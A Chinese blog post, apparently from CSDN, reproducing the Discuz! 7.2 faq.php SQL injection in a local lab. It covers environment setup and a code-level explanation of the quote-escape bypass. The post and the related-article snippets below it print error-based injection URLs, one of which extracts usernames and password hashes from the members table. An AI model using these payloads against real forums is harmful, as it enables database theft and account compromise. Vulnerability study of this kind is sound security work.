Discuz!7.2 SQL注入复现实验

最新推荐文章于 2025-05-16 20:18:14 发布
原创 最新推荐文章于 2025-05-16 20:18:14 发布 · 2.5k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

0x01 实验准备

实验原理:

Discuz7.2 SQL注入漏洞利用PHP特性突破GPC,形成SQL注入漏洞。

实验工具:

UCenter+Discuz 7.2安装包

实验环境:
  1. 安装 Discuz 网站的服务器(Windows)
  2. 安装 python 环境的攻击机

0x01 实验步骤

一、搭建环境
1. 安装UCenter

通过 http://192.168.88.129/dz7.2/upload/install/index.php 页面安装:
在这里插入图片描述
出现错误:
在这里插入图片描述
将UCenter文件放置在dz7.2文件夹下,访问http://192.168.88.129/dz7.2/UCenter/upload/install/index.php:
在这里插入图片描述
安装UCenter成功:
在这里插入图片描述

2. 安装Discuz

通过 UCenter 页面安装Discuz:
在这里插入图片描述
根据实际情况填写数据库等信息后,安装成功会自动跳转:
在这里插入图片描述

二、SQL注入漏洞复现
1. 漏洞形成原因

代码:
faq.php文件在 upload 文件夹下:

$query = $db->query("SELECT groupid, type, grouptitle, radminid FROM {
     
     $tablepre}usergroups ORDER BY (creditshigher<>'0' || creditslower<>'0'), creditslower");

discuz在全局会对GET数组进行addslashes转义,会将 ’ 转义成 ’ 。
当传入的参数是:gids[1]=' ,会被转义成 gids[1]=\'

$groupids = array();
foreach($gids as $row) {
   
   
	$groupids[] = $row[0];
}

赋值语句 $groupids[] = $row[0] 就相当于取了字符串的第一个字符
\,所以把转义符号取出来了。

function implodeids($array) {
   
   
	if(!empty($array)) {
   
   
		return "'".implode("','", is_array($array) ? $array : array($array))."'";
	} else {
   
   
		return '';
	}
}
此函数在 \include\global.func.php

将数据放入sql语句前,用 implodeids 处理过一次。implodeids函数是将$groupids数组用','分割开,组成一个类似于 ‘1’,‘2’,‘3’,‘4’ 的字符串返回。
由于刚取出一个转义符,会将正常的 ' 转义后为:'1','\','3','4'
第4个单引号被转义了,所以第5个单引号和第3个单引号形成了闭合。位置3就等于逃逸成功,形成注入。
通过提交 faq.php?gids[uid1]='&gids[uid2][0]=evilcode ,这样的构造形式语句可以突破GPC或类似的安全处理,形成SQL注入漏洞。
注意:uid1和uid2 > 网站注册用户iduid1与uid2不能相等

2.漏洞利用

(1)查询当前数据库/MySQL用户信息:

faq.php?action=grouppermission&gids[112]='&gids[113][0]=)and (select 1 from (select count(*),concat(database(),floor(rand(
最低0.47元/天 解锁文章

200万优质内容无限畅学
复现一个老漏洞 Discuz!7.2 faq.php 注入漏洞 分析原理
Au
10-18 4321
源码~   http://pan.baidu.com/s/1gfkvJrX poc /faq.php?action=grouppermission&amp;gids[99]=%27&amp;gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20fr...
墨者学院_CMS系统漏洞分析溯源(第9题)
weixin_50698958的博客
09-23 729
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
Discuz! 7.2
01-27
全新推出的Discuz! 7.2版本从用户注册登陆应用、社区论坛前后管理两方面着眼,增加和改进了30多处与社区门户运营密切相关的功能与细节,实现了邮箱登陆、分类信息检索、版块绑定域名等功能。
discuz7.2sql注入漏洞
weixin_40709439的博客
09-20 8730
今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码,在本地搭建漏洞环境 http://www.comsenz.com/downloads/install/discuz 下载的三个文件 利用http://localhost:8088/discuz72/upload/install/index.php进行安装...
SQL注入复现——DVWA靶场(有回显 vs 无回显)
最新发布
2402_84408069的博客
05-16 1159
本文通过DVWA靶场实战,详细介绍了SQL注入的两种主要类型:有回显的注入和无回显的注入。有回显的注入通过直接返回数据库数据或错误信息,利用Union-Based Injection技术快速获取敏感信息,如数据库名、表名和字段内容。无回显的注入则通过布尔盲注或时间盲注,逐字符猜解数据,效率较低但同样有效。文章还提供了自动化脚本示例,并总结了两种注入的关键差异。最后,通过提升DVWA难度和使用预编译语句,展示了如何有效防御SQL注入攻击。通过本次实战,读者可以深入理解SQL注入的利用手法及防御策略。
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
weixin_34067049的博客
07-18 1504
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战[antian365.com] simeon   最近网上公开了Discuz!7.2版本faq.php文件SQL注入0day,通过对文件漏洞分析以及实战测试,效果不错,公开利用exp的利用需要对SQL语句以及数据库等相当了解,在某些情况下需要多种技术配合才能最终攻克目标,下面就漏洞代码以及实战利用等进行探讨,对获取管理员密码的利用...
Discuz! 7.2 SQL注入exp
weixin_33728268的博客
07-06 235
已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。 下载地址:DZ7.2 附代码: &lt;?php   /**  * @author: xiaoma  * @blog  : www.i0day.com  * ...
Discuz 7.2/X1 第三方插件SQL注入及持久型XSS漏洞
swordheart的博客
04-18 4855
漏洞详情 披露状态: 2010-07-31: 细节已通知厂商并且等待厂商处理中 2010-08-01: 厂商已经确认,细节仅向厂商公开 2010-08-11: 细节向核心白帽子及相关领域专家公开 2010-08-21: 细节向普通白帽子公开 2010-08-31: 细节向实习白帽子公开 2010-08-31: 细节向公众公开 简要描述: Discuz7.2/X1 第三方插件SQL注入及持久型XSS漏洞SQL注入比较鸡肋,要求GPC为off(目前这样的网站几乎绝版了) XSS因为是持久型的,只要
Discuz 7.2 SQL注入漏洞详解及复现
**标题**: "Discuz7.2注入漏洞faq.php" 描述了针对Discuz! 7.2版本的一个特定SQL注入漏洞的详细探讨,尤其是在faq.php文件中的漏洞形成和利用过程。这个漏洞利用了PHP的特性,允许攻击者通过GPC (Get-Post-Cookie) ...
复现Discuz! UCenter 1.5安装压缩包
从压缩包名称 "discuz7.2 ucenter1.zip" 可知,该文件是为复现Discuz! 7.2 和 UCenter 1.5 环境所必需的。对于开发者或网站管理员来说,了解这些知识点有助于更有效地安装、配置和管理自己的社区论坛系统。
discuz7.2注入漏洞faq.php
01-08
复现discuz7.2注入漏洞
Discuz7.2版的faq.php SQL注入漏洞分析
12-18
注入代码实例: 制代码 代码如下: https://www.jb51.net/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from infor
DISCUZ7.2英文版
12-04
DISCUZ7.2ENGLISHBYCOOBY.rar DISCUZ7.2英文版,适合国外的
Discuz! v7.2 Bulid 20101020 简体UTF8 整合安装包.zip
07-07
Discuz! 7.2版本充分听取了来自社区运营一线的想法和需求,增加和改进30余处与社区门户运营密切相关的功能与细节。为了把握当前主流社区产品的应用趋势,满足 地方及垂直社区门户化、规模化发展的应用需求,康盛创想官方开发团队通过需求调研和走访交流,与全国各地数千名站长面对面的对话与沟通,在Discuz! 7.1版本的基础之上完成了产品的升级换代,实现了当前站长需求最迫切的数十项产品功能。 Discuz! 7.2  Changelog 20100110 更新内容: 修版本存在的重要安全问题 修版本中存在的其他使用 bug Discuz! 7.2  Changelog 20091126 更新列表: 修正 静态化URL导致多版块置顶不正常 修正 个人资料页语言包缺失 修正 无权限登陆缺少email选项 修正 版块绑定域名后去不掉 修正 图章管理撤销问题 修正 默认分类项目显示bug 修正 升级时非cdb_表前缀问题 修正 默认feeds数据的错误 修正 辩论帖用户头像重的问题 修正 分类信息建表字符集问题 修正 分类信息列表调整 修正 升级文件分类信息问题 修正 版主用户报告页面IE6下不能提交删除 修正 附件列表中判断媒体文件扩展名不区分大小写 修正 收费附件直接下载判断 修正 后台指删帖减积分时各版块积分设置优先 修正 utf-8版中活动帖导出excel乱码问题 修正 边栏 Warning错误 新增 去掉特殊主题的帖内广告限制 新增 版块设置制加入主题分类设置 Discuz! 7.2 Release 20101020 补丁包 修补办法: 下载并解压缩文件,上传文件到论坛根目录,覆盖原来的文件即可 问题修: 后台安全BUG。
discuz 7.2 SQL 注入漏洞分析
weixin_33860722的博客
01-28 671
2019独角兽企业重金招聘Python工程师标准>>> ...
php discuzSQL注入_Discuz7.2版的faq.php SQL注入漏洞分析
weixin_39866867的博客
03-08 187
这篇文章主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下注入代码实例://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select ...
php discuzSQL注入_discuz的php防止sql注入函数
weixin_35020639的博客
03-08 165
最近在做一个主题投票网站,客户懂一些程序方面的东西。有特别要求需要过滤一些字符防止sql注入。本来这方面就没有特别的研究过。呵呵,又发扬了一回拿来主义。把discuz论坛的sql注入函数取了来!制代码 代码如下:$magic_quotes_gpc = get_magic_quotes_gpc();@extract(daddslashes($_COOKIE));@extract(daddslas...
discuz7.2漏洞复现--python编写poc
m0_65129142的博客
12-21 1226
环境搭建 准备一台win7装上的phpstudy 将discuz7.2源码放进去 安装discuz之前,需要先安装center 文件夹搭建存放的位置是: 解压完成之后更改名称 再然后需要把ucenter放到discuz源码下边 开始安装 安装discuz之前 首先需要安装ucenter 我们先将源码拉进phpstudy根目录下边 首先安装ucenter 需要填的只有标红框的 安装完成之后 我们进行安装2 最关键的一步来了 需要将ucenter的url修改成http://192.168.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值